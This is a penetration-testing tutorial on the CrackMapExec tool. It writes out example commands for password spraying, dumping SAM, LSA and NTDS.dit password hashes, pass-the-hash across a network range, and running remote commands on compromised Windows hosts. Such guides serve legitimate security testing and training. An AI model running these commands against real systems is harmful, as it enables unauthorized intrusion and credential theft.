CrackMapExec
This section will cover using CrackMapExec.
Table of Contents
- Overview
- CrackMapExec Usage
- Dumping LSA secrets and SAM Database
- Capturing the NTDS.dit Contents
- Pass the Hash
- SMB
- Enumerating Logged-on Users
- Brute Forcing and Password Spraying
Overview
CrackMapExec is a post-exploitation tool for Windows and Active Directory networks. Given a single credential (a password or an NTLM hash) it can test logins across many hosts at once, enumerate shares and sessions, run commands and dump password hashes, over protocols such as SMB, LDAP, MSSQL and WinRM.
To install it on Debian-based distributions such as Kali, use apt install crackmapexec (as root or with sudo).
CrackMapExec Usage
We can use the -h flag to view the available options. Each protocol also has its own help page, shown by putting the protocol name before the -h flag:
crackmapexec smb -h
To use crackmapexec, we can use the following command.
crackmapexec <protocol> <Target IP> -u <username or username wordlist> -p <password or password wordlist>
Command breakdown:
- <protocol> - Specify the protocol to use (smb, ldap, mssql, winrm, ...).
- <Target IP> - Specify the target IP address (a hostname, a CIDR range or a file of targets also works).
- -u <username or username wordlist> - Specify a single username or a file of usernames.
- -p <password or password wordlist> - Specify a single password or a file of passwords.
An example will be:
crackmapexec smb 10.130.0.12 -u ~/main/wordlists/userlist.txt -p ~/main/wordlists/megapass.txt
Command breakdown:
- smb - Specify to use the SMB protocol.
- 10.130.0.12 - Specify the target IP address.
- -u ~/main/wordlists/userlist.txt - Specify the username wordlist.
- -p ~/main/wordlists/megapass.txt - Specify the password wordlist.
A working login is marked with [+]; when that account also has local administrator rights on the target, CrackMapExec appends (Pwn3d!) to the line. Once credentials are found, flags such as --shares can be used with the smb protocol to list the shares on the target and the access (READ, WRITE) the account has to each.
Dumping LSA secrets and SAM database
We can use crackmapexec to dump the SAM database (local account password hashes) or the LSA secrets (cached domain logons, service account passwords and other machine secrets) remotely, by specifying the --sam or --lsa flag. Both read the registry hives over the network and therefore need local administrator rights on the target.
crackmapexec <service> <Target IP> --local-auth -u <username> -p <password> --lsa
Command breakdown:
- <service> - Specify the protocol to use (smb for these dumps).
- <Target IP> - Specify the target IP address.
- --local-auth - Authenticate as a local account on the target rather than as a domain account.
- -u <username> - Specify the username to use for authentication.
- -p <password> - Specify the password to use for authentication.
- --lsa - Dump the LSA secrets.
An example will be:
crackmapexec smb 10.42.0.200 --local-auth -u myuser -p superS3cret --lsa
The above command dumps the LSA secrets. Replace --lsa with --sam to dump the SAM database instead, or pass both flags to get both in one run.
Note that a valid login alone is not enough: the account must be a local administrator on the target, which is the case when CrackMapExec marks the login with (Pwn3d!).
Capturing the NTDS.dit Contents
We can use the --ntds flag against a domain controller to dump the contents of NTDS.dit, which holds the password hashes of every domain account. By default CrackMapExec retrieves them through DRSUAPI replication (the same mechanism as DCSync); --ntds vss takes a volume shadow copy of the file instead.
crackmapexec <service> <DC IP> -u <username> -p <password> --ntds
An example will be:
crackmapexec smb <DC IP> -u svradmin -p adm1nPW --ntds
Note that the target must be a domain controller and the account needs Domain Admin rights or an equivalent role. The output is one line per domain account, and the default replication method looks like a DCSync to defenders, so expect it to be logged and alerted on.
Pass the Hash
We can authenticate with an NTLM hash instead of a password by replacing -p with -H. Combined with a CIDR range, this tests the hash against every host in the network, which is a quick way to find where a dumped or captured hash is valid.
crackmapexec <service> <Target Network IP>/<CIDR> -u <username> -d <domain> -H <NTLM hash>
Command breakdown:
- <service> - Specify the protocol to use.
- <Target Network IP>/<CIDR> - Specify the target network in CIDR notation; every host in the range is tried.
- -u <username> - Specify the username to use.
- -d <domain> - Specify the domain the account belongs to (use --local-auth instead for a local account).
- -H <NTLM hash> - Specify the NT hash (32 hex characters) or the full LM:NT pair.
An example will be:
crackmapexec smb 10.42.0.0/24 -u myuser -d acorp.lan -H BCD82943C6AC81E7DFFBD85D253961FA
We can also use the -x switch to run a command on each host where the login has local administrator rights (the (Pwn3d!) hosts). The command is executed through cmd.exe; use -X instead to run a PowerShell command.
crackmapexec smb 10.42.0.50 -u myuser -d acorp.lan -H BCD82943C6AC81E7DFFBD85D253961FA -x whoami
Command breakdown:
- smb - Specify the protocol to use.
- 10.42.0.50 - Specify the target IP address.
- -u myuser - Specify the user.
- -d acorp.lan - Specify the domain.
- -H BCD82943C6AC81E7DFFBD85D253961FA - Specify the hash.
- -x whoami - Specify a command to run, in this example whoami.
SMB
To enumerate SMB, we use the smb protocol together with flags such as --shares, --sessions, --pass-pol and --loggedon-users. The following shows one of them.
Enumerating Logged-on Users
We can use the --loggedon-users switch to list the users currently logged on to each host in a range, which is how you find the hosts where a privileged account has a session. Enumerating sessions this way requires local administrator rights on each host.
crackmapexec smb <Network address>/<CIDR> -u <username> -p '<password>' --loggedon-users
Command breakdown:
- smb - Specify to use the SMB protocol.
- <Network address>/<CIDR> - Specify the network address and CIDR of the network.
- -u <username> - Specify the username to use for authentication.
- -p '<password>' - Specify the password to use for authentication.
- --loggedon-users - Enumerate logged-on users.
An example:
crackmapexec smb 10.200.23.0/24 -u administrator -p 'password1' --loggedon-users
Brute Forcing and Password Spraying
We can specify a network or a single target together with a list of usernames and passwords to perform a brute force or password spray attack. By default every username is tried with every password, so check the domain lockout threshold first (the --pass-pol flag shows it) and spray only a few passwords, ideally one, per run. Two related flags matter here: --continue-on-success keeps testing after the first valid login instead of stopping, and --no-bruteforce pairs each username with the password on the same line of the password file rather than trying every combination. We can use the --local-auth flag to test local account logins.
crackmapexec smb <Target IP> -u /path/to/user/wordlist -p '<password>' --local-auth
Command breakdown:
- smb - Specify to use the SMB protocol.
- <Target IP> - Specify the IP address of the target.
- -u /path/to/user/wordlist - Specify the username wordlist to use.
- -p '<password>' - Specify the password to use for authentication.
- --local-auth - Log in as a local account.
An example:
crackmapexec smb 10.129.0.22 -u usernames.txt -p 'Password!' --local-auth